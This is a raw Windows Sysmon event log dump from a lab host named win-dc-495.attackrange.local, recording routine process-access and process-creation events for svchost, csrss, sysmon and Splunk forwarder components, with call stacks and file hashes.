13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.897{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:19.489{59A5CD1D-8E46-6005-0D00-00000000A301}6284796C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.754{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:44.614{59A5CD1D-92AC-6005-BB04-00000000A301}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.801{59A5CD1D-92AD-6005-BC04-00000000A301}49042912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.660{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 